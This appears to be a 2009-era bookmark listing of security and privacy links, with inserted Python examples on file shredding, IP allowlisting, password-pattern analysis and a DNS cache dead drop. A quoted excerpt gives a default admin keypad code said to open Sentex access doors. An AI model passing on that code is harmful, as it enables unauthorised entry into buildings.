Pages tagged security:

10+ Ways To Protect Images From Being Stolen
http://www.webresourcesdepot.com/10-ways-to-protect-images-from-being-stolen/
CopyGator.com - Is your content being duplicated, copied or plagiarized?
http://www.copygator.com/

Notice when others write (or copy) the same thing. Not that it really matters given CC.
OperaTor - Opera + Tor. Surf anonymously | Arche Twist
http://archetwist.com/opera/operator
OperaTor is a portable software bundle which allows you to browse the web anonymously. It combines the power of the Opera Browser, Tor and Polipo.
Cover Your Tracks & Be Anonymous On The Net With JAP | MakeUseOf.com
http://www.makeuseof.com/tag/cover-your-tracks-be-anonymous-on-the-net-with-jap/
OS/2
10 Steps To Protect The Admin Area In WordPress | Developer's Toolbox | Smashing Magazine
http://www.smashingmagazine.com/2009/01/26/10-steps-to-protect-the-admin-area-in-wordpress/
By Sergej Müller and Alex Frison. The administration area of a Web application is a favorite target of hackers and thus particularly well protected. The same goes for WordPress: when creating a blog, the system creates an administrative user with a perfectly secure password and blocks public access to the settings area with a log-in page. This is the cornerstone of its protection. Let’s dig deeper! This article focuses on defending the administration area of WordPress, meaning all those pages in the wp-admin folder (or http://www.yourblog.com/wp-admin/) that are displayed after a user is verified. We highlighted the phrase “after a user is verified” deliberately: it should be explicitly understood that only a simple query stands in the way of an evil hacker and the powerful admin area of your whole blog. The latter is only as strong as the passwords that are generated.
What the Web knows about you
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9125058
If you're not concerned about privacy in the age of the Internet yet, you should be. Don't want to take my word for it? Then read this.
What information is available about you in cyberspace? Where does it come from, and what risks does it present? Computerworld's Robert L. Mitchell set out to see just how much he could find about himself online. What he discovered is frightening.
The web is fast becoming the collective knowledge base of all of humanity, for better or for worse.
It’s Me, and Here’s My Proof: Why Identity and Authentication Must Remain Distinct
http://technet.microsoft.com/en-us/library/cc512578.aspx
public / private data with logging on
Overview of the security principles identity, authentication and authorization.
Security
Very clear description of the problem. Identity - "who are you?" - public assertion - locally unique. Authentication - "how can you prove it?" - secret response - non-unique. So biometrics are identity, not authentication.
Introducing EverSave 1.0.1
http://www.tool-forcesw.com/eversave/
A free application for the Mac which saves your documents on regular intervals based on your preferences.
Save files before your Mac applications quit on you
Never again lose hours of hard work to an unexpected crash. EverSave brings an automated, timed saving function to any application on your Mac.
Auto-save tool for all Mac applications!
Automatically saves your work at a specified interval. Works with the applications you use on a daily basis. Set the options in the menubar.
Some Things Need To Change
http://www.techcrunch.com/2009/01/28/some-things-need-to-change/
Journalists making themselves the story. That could stand to change. Not that i wish that stuff on anyone.
Yesterday as I was leaving the DLD Conference in Munich, Germany someone walked up to me and quite deliberately spat in my face. Before I even understood what was happening, he veered off into the crowd, just another dark head in a dark suit. People around me stared, then looked away and continued their conversation.
M-Lab | Welcome to Measurement Lab
http://measurementlab.net/
Founded by Google. Quote: "M-Lab is an open, distributed server platform for researchers to deploy Internet measurement tools."
whspr! | Get Emails Without Revealing Your Email Address
http://whspr.me/
Need to receive a message by email, but can't (or don't want to) give out your email address? whspr! gives you a URL to share instead. So what? Here's an example: Say you want to advertise a job opening on Twitter, and you don't want to share your company email address. Some applicants may not want to post a public @reply, and they can't send you a direct message if you don't already follow them. Include a whspr! URL, and they can reach you discreetly.
How to Build a Login System for a Simple Website - NETTUTS
http://nettuts.com/videos/screencasts/how-to-build-a-login-system-for-a-simple-website/
login tutorial
Building a simple login system in PHP
Tutorial on building a login system
User Accounts
Hotspot Shield for iPhone
http://hotspotshield.com/clientless/iphone/get_started.php
How to Friend Mom, Dad, and the Boss on Facebook...Safely - ReadWriteWeb
http://www.readwriteweb.com/archives/how_to_friend_mom_dad_and_the.php
Oh no! Your mom just joined Facebook and what's even worse, she wants to be your friend. More and more people are finding themselves in this situation today and unsure of what to do. Friending mom and dad, the boss, or other work colleagues opens up the details of your private life for the whole world to see - and you might not be entirely comfortable with that. What's to be done?
Guide to friend lists
Official Google Blog: "This site may harm your computer" on every search result?!?!
http://googleblog.blogspot.com/2009/01/this-site-may-harm-your-computer-on.html
If you did a Google search between 6:30 a.m. PST and 7:25 a.m. PST this morning, you likely saw that the message "This site may harm your computer" accompanied each and every search result. This was clearly an error, and we are very sorry for the inconvenience caused to our users.
Well that explains that...
"If you did a Google search between 6:30 a.m. PST and 7:25 a.m. PST this morning, you likely saw that the message "This site may harm your computer" accompanied each and every search result. This was clearly an error, and we are very sorry for the inconvenience caused to our users. What happened? Very simply, human error" bit worrying really
10 Privacy Settings Every Facebook User Should Know
http://www.allfacebook.com/2009/02/facebook-privacy/
Are You Making These 10 PHP Mistakes? - NETTUTS
http://nettuts.com/articles/are-you-making-these-10-php-mistakes/
oooooooo
php
Svchost Viewer Shows Exactly What Each svchost.exe Instance is Doing :: Mysticgeek’s Realm
http://blogs.howtogeek.com/mysticgeek/2009/02/02/svchost-viewer-shows-exactly-what-each-svchostexe-instance-is-doing/
A tool that investigates which svchost.exe instances are running.
I'm Still Tortured by What I Saw in Iraq - washingtonpost.com
http://www.washingtonpost.com/wp-dyn/content/article/2008/11/28/AR2008112802242.html?hpid=opinionsbox1
via rodcorp
On the problems of torture and benefits of simple detective investigation: "We got to know our enemies, we learned to negotiate with them, and we adapted criminal investigative techniques to our work [...] 'I decided that everything I was told about Americans was wrong. That's why I decided to cooperate.' [...] I learned in Iraq that the No. 1 reason foreign fighters flocked there to fight were the abuses carried out at Abu Ghraib and Guantanamo"
I learned in Iraq that the No. 1 reason foreign fighters flocked there to fight were the abuses carried out at Abu Ghraib and Guantanamo. Our policy of torture was directly and swiftly recruiting fighters for al-Qaeda in Iraq. The large majority of suicide bombings in Iraq are still carried out by these foreigners. They are also involved in most of the attacks on U.S. and coalition forces in Iraq. It's no exaggeration to say that at least half of our losses and casualties in that country have come at the hands of foreigners who joined the fray because of our program of detainee abuse. The number of U.S. soldiers who have died because of our torture policy will never be definitively known, but it is fair to say that it is close to the number of lives lost on Sept. 11, 2001. How anyone can say that torture keeps Americans safe is beyond me -- unless you don't count American soldiers as Americans.
How could anyone deny the opinions of someone on the ground ... especially someone on the ground who was successful.
Until we renounce the sorts of abuses that have stained our national honor, al-Qaeda will be winning.
Interrogator reveals practical reasons why torture was not just wrong in principle, but counterproductive in practice.
7 Cool Things to Do With Linux | davehayes.org
http://www.davehayes.org/2009/01/16/7-cool-things-to-do-with-linux
So you’ve taken the plunge and installed Linux. You’ve followed all the HOWTOs all over the net. You’ve got your wireless card working flawlessly. You’ve got your video card working (and you’ve begun to loathe that spinning cube). You’ve installed all the “restricted” software like Adobe Flash, Sun Java and Google Earth. You’ve got all the patent restricted codecs and even DVD playback working just like you want. Now what? You want to know what you can do with Linux outside of the surfing, emailing, chatting and media consumption you normally do? Well, here are a few things to keep you busy.
How to Friend Mom, Dad, and the Boss on Facebook...Safely - NYTimes.com
http://www.nytimes.com/external/readwriteweb/2009/01/30/30readwriteweb-how_to_friend_mom_dad_and_the.html?em
If you're not ready to expose everything about you to anyone who asks to be your online friend, it's time you learned how to use Facebook's friend lists.
How to keep stuff you want open open and stuff you want secret secret. Includes discussion of Facebook's own advice about it.
This is interesting because social networking is not just about staying in touch. We now selectively choose who to communicate with as well as who can communicate with us and how much they can know about us.
xkcd - A Webcomic - Security
http://xkcd.com/538/
xkcd on a long RSA key and a different kind of key (a wrench)...
Security: Properly Erase Your Physical Media
http://lifehacker.com/5153684/properly-erase-your-physical-media
For class
erase files forever, nuke HD hard drive
Facebook | How to permanently delete your facebook account.
http://www.facebook.com/group.php?gid=16929680703
Ever tried to leave Facebook and found out they only allow you to "deactivate" your account? All your personal data, including photos, interests, friends etc will still be saved indefinitely! You don’t have to be a conspiracist to find this quite fishy (or simply annoying)! Look further down for instructions on how to get your account permanently deleted.
Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, post links and videos, and learn more about the people they meet.
Ajax Fancy Captcha - jQuery plugin - WebDesignBeach.com
http://www.webdesignbeach.com/beachbar/ajax-fancy-captcha-jquery-plugin
Cool stuff
Ajax Fancy Captcha is a jQuery plugin that helps you protect your web pages from bots and spammers. We are introducing you to a new, intuitive way of completing “verify humanity” tasks. In order to do that you are asked to drag and drop a specified item into a circle.
SIMPLY STUNNING jQuery CAPTCHA! NICE! I want to use this now!
SHUURL | Making Safer Short URL's
http://shuurl.com/index.php
Shuurl is a free service that offers safe short URLs.
Like bit.ly and others.
50 seriously useful Windows 7 tips | News | TechRadar UK
http://www.techradar.com/news/software/operating-systems/50-seriously-useful-windows-7-tips-528483
It's the mother lode of Windows 7 tweaks and tricks!
Hive Five: Five Best Live CDs
http://lifehacker.com/5157811/five-best-live-cds
The following tools are unique compared to many of our software Hive Fives in that they are entirely independent of the main operating system installed on the computer. Live CDs load into the memory and allow you to use operating systems and accompanying tools without having to perform a permanent installation on the machine
OneSwarm: Privacy preserving P2P
http://oneswarm.cs.washington.edu/
OneSwarm is a new P2P data sharing application we’re building to provide users with explicit control over their privacy by enabling fine-grained control over how data is shared
privacy preserving P2P file sharing software
P2P Privacy
Security
Codyssey.com - Free shredder
http://codyssey.com/
Ordinary deletion of files isn't enough! When you wish to delete sensitive information, like industrial secrets or other unwanted content, you want to be sure that it is deleted permanently. Sorry to say, there are plenty of software recovery tools that can restore your deleted items. If you need to destroy data and eliminate any possibility of restoring it, you need a "shredder". This software destroys the data you choose before deleting it, by overwriting the actual content with random data.
Free document shredder (download)
Hard disk erasing utility (so deleted file cannot be recovered). Similar software: "Eraser", see http://www.heidi.ie/node/6
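The overwrite-before-unlink procedure the shredder entries above describe, as an added example in Python. This is not Codyssey's or Eraser's code; file names, the sample content and the temp-file demo are constructed here. It also renames the file to a random name before unlinking, since the original file name in the directory entry is a leak of its own.

```python
import os
import secrets
import tempfile


def shred(path: str, passes: int = 1, chunk: int = 1 << 16) -> int:
    """Overwrite a file in place with random bytes, then unlink it.

    Returns the number of bytes overwritten per pass. Each pass is flushed and
    fsync'ed so the writes reach the device before the file is removed.
    """
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for _ in range(passes):
            f.seek(0)
            remaining = size
            while remaining:
                n = min(chunk, remaining)
                f.write(secrets.token_bytes(n))   # CSPRNG output, not a fixed pattern
                remaining -= n
            f.flush()
            os.fsync(f.fileno())
    # Scrub the name too: a directory entry with the original file name is itself a leak.
    directory = os.path.dirname(path) or "."
    anonymous = os.path.join(directory, secrets.token_hex(8))
    os.replace(path, anonymous)
    os.remove(anonymous)
    return size


def demo() -> tuple:
    """Create a throwaway file with constructed content, shred it, report (bytes, still_exists)."""
    with tempfile.NamedTemporaryFile("wb", delete=False) as f:
        f.write(b"industrial secret " * 10000)    # constructed content, 180000 bytes
        path = f.name
    written = shred(path, passes=2)
    return written, os.path.exists(path)


if __name__ == "__main__":
    print(demo())
```

Overwriting only helps where the filesystem rewrites blocks in place, which is the spinning-disk case these tools were written for. On SSDs with wear levelling, on copy-on-write filesystems (ZFS, btrfs, APFS), with data journaling, snapshots or backups, the old blocks can survive untouched, so the dependable approach there is full-disk encryption with destruction of the key.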
9 free antivirus programs for Windows - Download Squad
http://www.downloadsquad.com/2009/02/23/9-free-antivirus-programs-for-windows/
until they stop producing idiots some people
7 Security Tools You Absolutely MUST Have | MakeUseOf.com
http://www.makeuseof.com/tag/7-security-tools-you-absolutely-must-have/
10 Free CAPTCHA scripts and services for websites
http://woork.blogspot.com/2009/02/10-free-captcha-scripts-and-services.html
Block a Website for Everyone But You
http://css-tricks.com/block-a-website-for-everyone-but-you/
Nice technique
Quick little .htaccess trick today for ya’ll. This snippet will redirect any visitor who is not at at one of the provided IP addresses. You can use as many or as few as you would like. This is just a very quick way to block access to a site for, say, everyone but you. Or, everyone but you and a few select co-workers or clients.
Use this technique to whitelist IPs to view a site and block everyone else.
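The same allowlist check as the .htaccess snippet, as an added example in Python rather than the css-tricks author's mod_rewrite rules: a WSGI wrapper that redirects every request whose client address is not on the list. It also covers the case the .htaccess version does not, a site behind a reverse proxy, where REMOTE_ADDR is the proxy and X-Forwarded-For is client-controlled. The addresses (RFC 5737 and RFC 1918 ranges), the proxy, the redirect target and the `status_for` driver are all constructed for illustration.

```python
import ipaddress

# Constructed allow list and proxy address, not the snippet's real IPs.
ALLOWED = [ipaddress.ip_network(n) for n in ("203.0.113.10/32", "198.51.100.0/24")]
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.1/32")]


def client_ip(environ, trusted_proxies=()):
    """Return the address this request should be judged by.

    REMOTE_ADDR is the TCP peer and cannot be forged. X-Forwarded-For is a
    client-controlled header, so it is honored only when the peer is one of our
    own proxies, and then only its rightmost entry, which that proxy appended.
    """
    peer = ipaddress.ip_address(environ["REMOTE_ADDR"])
    forwarded = environ.get("HTTP_X_FORWARDED_FOR", "")
    if forwarded and any(peer in net for net in trusted_proxies):
        return ipaddress.ip_address(forwarded.split(",")[-1].strip())
    return peer


def is_allowed(ip, allowlist=ALLOWED) -> bool:
    return any(ip in net for net in allowlist)


def allowlist_middleware(app, allowlist=ALLOWED, trusted_proxies=(),
                         redirect_to="https://example.com/"):
    """WSGI wrapper with the .htaccess rule's effect: redirect everyone not on the list."""
    def wrapped(environ, start_response):
        try:
            ip = client_ip(environ, trusted_proxies)
        except (KeyError, ValueError):          # missing or malformed address: deny
            ip = None
        if ip is None or not is_allowed(ip, allowlist):
            start_response("302 Found", [("Location", redirect_to), ("Content-Length", "0")])
            return [b""]
        return app(environ, start_response)
    return wrapped


def _site(environ, start_response):
    """Stand-in for the protected site."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"staging site"]


def status_for(remote_addr, forwarded=None, trusted_proxies=()):
    """Drive the middleware with a constructed WSGI environ and return the status line."""
    environ = {"REMOTE_ADDR": remote_addr}
    if forwarded is not None:
        environ["HTTP_X_FORWARDED_FOR"] = forwarded
    seen = {}
    app = allowlist_middleware(_site, trusted_proxies=trusted_proxies)
    b"".join(app(environ, lambda status, headers: seen.update(status=status)))
    return seen["status"]


if __name__ == "__main__":
    print(status_for("203.0.113.10"), status_for("203.0.113.11"))
```

Behind a CDN or load balancer the plain .htaccess rule sees the proxy's address for everyone, so it either locks everyone out or, if X-Forwarded-For is trusted blindly, lets in anyone who sends a forged header. The wrapper above only believes the header when the TCP peer is a listed proxy, and only the entry that proxy appended.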
Getting OpenID Into the Browser - O'Reilly Radar
http://radar.oreilly.com/2008/12/getting-openid-into-the-browse.html
BBC NEWS | Technology | Dangerous coding errors revealed
http://news.bbc.co.uk/1/hi/technology/7824939.stm
The US National Security Agency has helped put together a list of the world's most dangerous coding mistakes.
funny article
25 common coding mistakes, eg CWE-426: Untrusted Search Path
Coding Horror: Dictionary Attacks 101
http://www.codinghorror.com/blog/archives/001206.html
Some ways of making this more avoidable
I like the increasing delay idea
PHPBB Password Analysis - Hacked Off - Dark Reading
http://www.darkreading.com/blog/archives/2009/02/phpbb_password.html
phpBB users' password patterns
Hilarious analysis of how people choose their (extremely naive) passwords
Dark Reading | Security | Protect The Business - Enable Access
A popular Website, phpbb.com, was recently hacked. The hacker published approximately 20,000 user passwords from the site. This is like candy to us security professionals because it's hard data we can use to figure out how users choose passwords. I wrote a program to analyze these passwords looking for patterns, and came up with some interesting results.
Analysis of phpBB passwords - interesting observations on some password choices
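The kind of pattern analysis the Dark Reading post and the Coding Horror dictionary-attack post above talk about, as an added example in Python. This is not the Dark Reading author's program or data: the password list and the wordlist are constructed here. It buckets passwords by character-class pattern and counts how many would fall to a dictionary attack with the usual cheap mangling rules (appended digits, capitalization, leetspeak).

```python
import re
from collections import Counter

# Constructed sample standing in for a leaked dump; not the phpbb.com data.
SAMPLE_PASSWORDS = [
    "123456", "password", "phpbb", "qwerty", "letmein", "12345678",
    "dragon", "monkey1", "Password1", "abc123", "iloveyou", "trustno1",
    "summer2008", "jessica", "football", "1q2w3e", "p@ssw0rd", "hunter2",
    "mike123", "123456", "password", "phpbb", "qwerty", "123456",
]

# Tiny constructed wordlist; a real run would load a full dictionary file.
WORDLIST = {"password", "phpbb", "qwerty", "letmein", "dragon", "monkey",
            "football", "iloveyou", "jessica", "summer", "hunter", "mike"}

# Reverse leetspeak: map common substitutions back to letters.
LEET = str.maketrans("@0134$!", "aolaesi")


def classify(pw: str) -> str:
    """Bucket a password by the pattern of character classes it uses."""
    if pw.isdigit():
        return "digits only"
    if pw.isalpha():
        return "letters only"
    if re.fullmatch(r"[a-z]+\d{1,4}", pw):
        return "lowercase word + short number"
    if re.fullmatch(r"[A-Za-z]+\d+", pw):
        return "word + digits"
    if re.search(r"[^A-Za-z0-9]", pw):
        return "contains symbol"
    return "mixed alphanumeric"


def dictionary_hit(pw: str, words=WORDLIST) -> bool:
    """True if a dictionary attack with simple mangling rules would find pw."""
    lower = pw.lower()                            # rule: case-fold
    stem = re.sub(r"\d{1,4}$", "", lower)         # rule: strip appended digits
    candidates = {lower, stem, lower.translate(LEET), stem.translate(LEET)}
    return any(c in words for c in candidates)


def analyze(passwords, words=WORDLIST) -> dict:
    """Summarize a password list the way a breach write-up would."""
    freq = Counter(passwords)
    return {
        "count": len(passwords),
        "unique": len(freq),
        "top": freq.most_common(3),
        "lengths": Counter(len(p) for p in passwords),
        "classes": Counter(classify(p) for p in passwords),
        "dictionary_hits": sum(dictionary_hit(p, words) for p in passwords),
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_PASSWORDS).items():
        print(f"{key}: {value}")
```

The "dictionary_hits" figure is the one that matters for the login-throttling discussion: every password it counts is one an online attacker would reach within a few thousand guesses, which is why rate limiting and increasing delays per failed attempt are the defence on the server side.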
OpenID concepts and glossary explained in 10 minutes - livedoor Director Blog
http://blog.livedoor.jp/ld_directors/archives/51127588.html
It's Data Privacy Day: Do You Know Where Your Data Is?
http://lifehacker.com/5141106/its-data-privacy-day-do-you-know-where-your-data-is
We've covered oodles of privacy apps and topics over the years at Lifehacker, but here are some of our personal favorites:
Encryption, anonymous browsing, password management, secure file deletion, encrypted communications...
Today is Data Privacy Day, during which we're encouraged to reflect on the state of our data and bolster security where we can—so let's take a closer look at our favorite data privacy tips.
Cheap SSL Certificates - RapidSSL, Geotrust, Verisign
http://sslmatic.com/
SSL Certificates Are Ready In 15 Minutes
$19.99 a year for SSL certs
Sanitize: A whitelist-based Ruby HTML sanitizer
http://wonko.com/post/sanitize
sanitize html strip remove tags
Ruby HTML sanitizer
nifty ruby sanitization library
gem layered on Hpricot
"Working faster on your PC", part 21: Using Dropbox more "securely" with TrueCrypt - ITmedia Biz.ID
http://www.itmedia.co.jp/bizid/articles/0901/19/news024.html
How to use Dropbox
I didn't know it used binary diffs. I thought it worked at the file level.
Why hasn't America been attacked since 9/11? - By Timothy Noah - Slate Magazine
http://www.slate.com/id/2208971/
An interactive inquiry about why America hasn't been attacked again. By Timothy Noah. Updated Friday, Feb. 27, 2009, at 8:59 AM ET
This is the first in a series of eight essays exploring why the United States suffered no follow-up terror attacks after 9/11.
Landon Fuller
http://landonf.bikemonkey.org/code/security/DNS_Dead_Drop.20060128201048.26517.luxo.html
The DNS Dead Drop Storing Arbitrary Messages in Remote DNS Caches A few months ago, I read Dan Kaminsky's presentation slides, Attacking Distributed Systems: The DNS Case Study. In the presentation, Kaminsky documents a method of implementing single bit data transfer with nothing more than: * A recursive, caching name server * A wildcard zone After a particularly stressful week, I decided I needed to work on something fun -- an implementation of a DNS-based dead drop messaging system, utilizing Kaminsky's ideas.
DNS Dead Drop
The DNS Dead Drop
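The dead-drop mechanism described above, as an added example in Python. It is not Landon Fuller's implementation and sends no real DNS traffic: the recursive resolver, the wildcard zone and the clock are in-memory models so the exchange can be stepped through offline. The zone name and the TEST-NET answer address are constructed. The writer plants bit i = 1 by sending a recursive (RD=1) query for label i, which the resolver fetches and caches; the reader sends non-recursive (RD=0) queries, which a cooperating resolver answers only from cache, so a cached label reads as 1 and a miss as 0.

```python
import time

ZONE_SUFFIX = "drop.example.com"              # constructed zone with a wildcard record


class WildcardZone:
    """Toy authoritative server: any name under the suffix resolves (the wildcard)."""

    def __init__(self, suffix: str, ttl: int = 300):
        self.suffix, self.ttl = suffix, ttl

    def lookup(self, name: str):
        if name.endswith("." + self.suffix):
            return "192.0.2.1", self.ttl           # TEST-NET address, constructed
        return None


class CachingResolver:
    """Toy recursive resolver.

    RD=1 queries are resolved upstream and cached until the TTL runs out.
    RD=0 queries are answered from cache only, which is what makes the cache readable.
    """

    def __init__(self, zone: WildcardZone, clock=time.monotonic):
        self.zone, self.clock, self.cache = zone, clock, {}

    def query(self, name: str, rd: bool):
        now = self.clock()
        cached = self.cache.get(name)
        if cached and cached[1] > now:
            return cached[0]
        if not rd:
            return None                            # not cached, and told not to recurse
        answer = self.zone.lookup(name)
        if answer is None:
            return None
        self.cache[name] = (answer[0], now + answer[1])
        return answer[0]


def _bits(data: bytes):
    for byte in data:
        for i in range(7, -1, -1):
            yield (byte >> i) & 1


def drop_write(resolver: CachingResolver, channel: str, data: bytes) -> int:
    """Writer: a recursive query for label i plants bit i = 1. Returns bits planted."""
    planted = 0
    for i, bit in enumerate(_bits(data)):
        if bit:
            resolver.query(f"{i}.{channel}.{ZONE_SUFFIX}", rd=True)
            planted += 1
    return planted


def drop_read(resolver: CachingResolver, channel: str, nbytes: int) -> bytes:
    """Reader: non-recursive queries reveal which labels are cached; a miss reads as 0."""
    out = bytearray()
    for b in range(nbytes):
        value = 0
        for i in range(b * 8, b * 8 + 8):
            hit = resolver.query(f"{i}.{channel}.{ZONE_SUFFIX}", rd=False) is not None
            value = (value << 1) | int(hit)
        out.append(value)
    return bytes(out)


def demo():
    """Plant "hi", read it back, then show the message evaporating with the TTL."""
    clock = [0.0]
    resolver = CachingResolver(WildcardZone(ZONE_SUFFIX, ttl=300), clock=lambda: clock[0])
    drop_write(resolver, "msg1", b"hi")
    fresh = drop_read(resolver, "msg1", 2)
    clock[0] += 301                                # past the TTL: entries are dead
    expired = drop_read(resolver, "msg1", 2)
    return fresh, expired


if __name__ == "__main__":
    print(demo())
```

Two properties of the real thing carry over from the model: a reader has to know the channel name and the message length, because an unwritten bit and a zero bit look identical, and the message lives exactly one TTL. What the model leaves out is that many resolvers now refuse RD=0 queries from outside their network, or answer them without consulting the cache, precisely because this cache-snooping behaviour leaks what their users have looked up.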
How to Delete Accounts from Any Website - Features by PC Magazine
http://www.pcmag.com/article2/0,2817,2342599,00.asp
Features by PC Magazine
Oh sweet. Now I can finally get rid of my stupid myspace.
Deleting accounts you've created on Facebook, MySpace, AOL, and elsewhere on the Web isn't always easy. Here are the details on leaving 23 services behind.
The 13 Most Essential Plugins for WordPress - NETTUTS
http://net.tutsplus.com/articles/web-roundups/the-13-most-essential-plugins-for-wordpress/
The Untold Story of the World's Biggest Diamond Heist
http://www.wired.com/politics/law/magazine/17-04/ff_diamonds?currentPage=all
How to Be Jason Bourne: Multiple Passports, Swiss Banking, and Crossing Borders
http://www.fourhourworkweek.com/blog/2009/03/03/how-to-be-jason-bourne-multiple-passports-swiss-banking-and-crossing-borders/
Really interesting article
The blog of a guy learning to survive in an uncertain world future. Interesting reading.
Death Switch
http://www.deathswitch.com/
wow this is an interesting idea, albeit morbid.
A service that sends out messages after you're gone.
Sounds creepy, but it worth thinking about
Death Switch allows you to send out email messages, in the case of your demise. It repeatedly contacts you, and if you don't answer within a specified time window, it triggers the 'last message' to whoever you specify.
The Untold Story of the World's Biggest Diamond Heist
http://www.wired.com/politics/law/magazine/17-04/ff_diamonds
In February 2003, Notarbartolo was arrested for heading a ring of Italian thieves. They were accused of breaking into a vault two floors beneath the Antwerp Diamond Center and making off with at least $100 million worth of loose diamonds, gold, jewelry, and other spoils. The vault was thought to be impenetrable. It was protected by 10 layers of security, including infrared heat detectors, Doppler radar, a magnetic field, a seismic sensor, and a lock with 100 million possible combinations. The robbery was called the heist of the century, and even now the police can't explain exactly how it was done. The loot was never found, but based on circumstantial evidence, Notarbartolo was sentenced to 10 years. He has always denied having anything to do with the crime and has refused to discuss his case with journalists, preferring to remain silent for the past six years. Until now.
Compelling yarn, optioned for screen adaptation for obvious reasons.
Make: Online : Getting free wireless in airports and hotels
http://blog.makezine.com/archive/2009/03/getting_free_wireless_in_airports_and_hotels.html?CMP=OTC-0D6B48984890
Using tunneling over DNS or ICMP
10+ Best Firefox Addons for Security and Privacy | MakeUseOf.com
http://www.makeuseof.com/tag/best-firefox-addons-for-enhancing-security-and-privacy/
TabRenamizer and Page Title Eraser - Do your tabs give you away? Why not change their names with TabRenamizer or remove the names all together with Page Title Eraser? Both these addons let you play with the tab titles so that you can change them according to your will.
XSS (Cross Site Scripting) Prevention Cheat Sheet - OWASP
http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
10 Advanced PHP Tips Revisited | How-To | Smashing Magazine
http://www.smashingmagazine.com/2009/03/24/10-useful-php-tips-revisited/
A Better Login System - Nettuts+
http://net.tutsplus.com/tutorials/php/a-better-login-system/
ACL
Screenshot Tour: BackTrack is a Security-Focused Live CD Packed With System Tools
http://lifehacker.com/5166530/backtrack-is-a-security+focused-live-cd-packed-with-system-tools
ipredator
http://ipredator.se/
VPN service from the Pirate Bay guys
virtual private network by ThePirateBay... currently unjoinable :P
from the pirate bay makers
Thanks to the VPN link, the data passing through cannot be identified by ISPs or by any private network-surveillance outfits, so that it will in theory be impossible to say what kind of use (downloading, VoIP communication, online gaming, etc.) an Internet user is making of the service.
The Spanner - XSS Rays
http://www.thespanner.co.uk/2009/03/25/xss-rays/
Most common passwords list from 3 databases
http://blog.jimmyr.com/Password_analysis_of_databases_that_were_hacked_28_2009.php
List of most commonly used passwords
A detailed password analysis of compromised passwords from myspace, phpbb, and singles.org
I wondered why the Singles.org passwords had so many religious words, then realized it's a dating site for Christians.
scr.im « Share your email in a safe way. Get less spam.
http://scr.im/
Convert your email address into a short, cute and safe link you can share on the web, in Twitter, forums, Craigslist, anywhere
A quick easy way to share your email address online without fear of spambots.
Protect your email address. Share your email in a safe way. Get less spam.
Last-minute Conficker survival guide : Christopher Null : Yahoo! Tech
http://tech.yahoo.com/blogs/null/132464
tech.yahoo.com: Conficker tips
An article about Conficker virus.
Informatik IV: Containing Conficker
http://iv.cs.uni-bonn.de/wg/cs/applications/containing-conficker/
Containing Conficker Tools and Infos
The following page contains the tools and analysis results described in our "Know your Enemy" paper "Containing Conficker - To Tame a Malware". The paper is published by the Honeynet Project and can be downloaded here: https://www.honeynet.org/papers/conficker
Conficker Eye Chart
http://www.confickerworkinggroup.org/infection_test/cfeyechart.html
simple tool from the malware working group, but someone will have to rotate images.
This works because the virus tries to keep your computer from accessing various AV websites.
Easily test your computer for a Conficker infection
Hmm, is this real?
Conficker Eye Chart
http://www.joestewart.org/cfeyechart.html
I think this is the original
joshua's blog: on url shorteners
http://joshua.schachter.org/2009/04/on-url-shorteners.html
Interesting opinion piece on the hazards of link shortening services - inserts an unreliable middleman in the standard web transaction.
All good points in here.
"We need to prepare for the day when N of the URL shorteners go out of business. When that happens a large part of the web will die. It will not be a good day." - Scripting News http://www.scripting.com/stories/2009/04/03/joshIsRightUrlShortenersAr.html
Why URL shorterners are bad for the Internet.
David Rusenko - How to open many keypad-access doors
http://david.weebly.com/1/post/2009/03/how-to-open-many-keypad-access-doors.html
How to open many keypad-access doors, 03/11/2009. Here's a fun little tip: You can open most Sentex key pad-access doors by typing in the following code: ***00000099#* The first *** are to enter into the admin mode, 000000 (six zeroes) is the factory-default password, 99# opens the door, and * exits the admin mode (make sure you press this or the access box will be left in admin mode!) I'm not sure how prevalent they are, but here in San Francisco, Sentex building access systems seem to be the most popular.
Default-password fail.
Electricity Grid in U.S. Penetrated By Spies - WSJ.com
http://online.wsj.com/article/SB123914805204099085.html
Cyberspies have penetrated the U.S. electrical grid and left behind software that could be used to disrupt the system.
eek
Unresolvable
Looks like something out of a movie!
Top 7 Icon Search Engines | SingleFunction
http://singlefunction.com/top-7-icon-search-engines/
Awesome Icon search engines
SwarmScreen (Hiding in the Crowd)
http://aqualab.cs.northwestern.edu/projects/SwarmScreen.html
"To address this threat, we propose a new privacy-preserving layer for P2P systems that obfuscates user-generated network behavior. We show that a user can achieve plausible deniability by simply adding a small percent (between 25 and 50%) of additional random connections that are statistically indistinguishable from natural ones. Based on this result, we designed SwarmScreen, a system that generates such connections by participating in randomly selected torrents without appearing suspicious. Our SwarmScreen plugin, which seamlessly installs into the Vuze/Azureus BitTorrent client, can be downloaded from the project page."
20 registry hacks to make your PC more awesome | News | TechRadar UK
http://www.techradar.com/news/software/operating-systems/20-registry-hacks-to-make-your-pc-more-awesome-590803
Different registry tweaks to do random things. Encryption etc.
De-anonymizing Social Networks
http://randomwalker.info/social-networks/index.html
How to Build a Spy Camera | Ugolog.com
http://www.ugolog.com/pages/build-a-spy-camera
webcam
In Warrantless Wiretapping Case, Obama DOJ's New Arguments Are Worse Than Bush's | Electronic Frontier Foundation
http://www.eff.org/deeplinks/2009/04/obama-doj-worse-than-bush
We had hoped this would go differently.
April 7th, 2009. Friday evening, in a motion to dismiss Jewel v. NSA, EFF's litigation against the National Security Agency for the warrantless wiretapping of countless Americans, the Obama Administration made two deeply troubling arguments.
5 Things You Don’t Know About User IDs That Will Destroy You at time to bleed by Joe Damato
http://timetobleed.com/5-things-you-dont-know-about-user-ids-that-will-destroy-you/
[Danger] Publish your real name and your address, phone number and more are exposed too : HemoSTATION BLOG
http://hemohemoblog.blog38.fc2.com/blog-entry-1.html
A to Z of WordPress .htaccess Hacks | Nometech.com
http://www.nometech.com/blog/a-to-z-of-wordpress-htaccess-hacks/
Inside the precision hack « Music Machinery
http://musicmachinery.com/2009/04/15/inside-the-precision-hack/
The hackers knocked Rain down the list for moot! ...But it's still a sick hack.:B
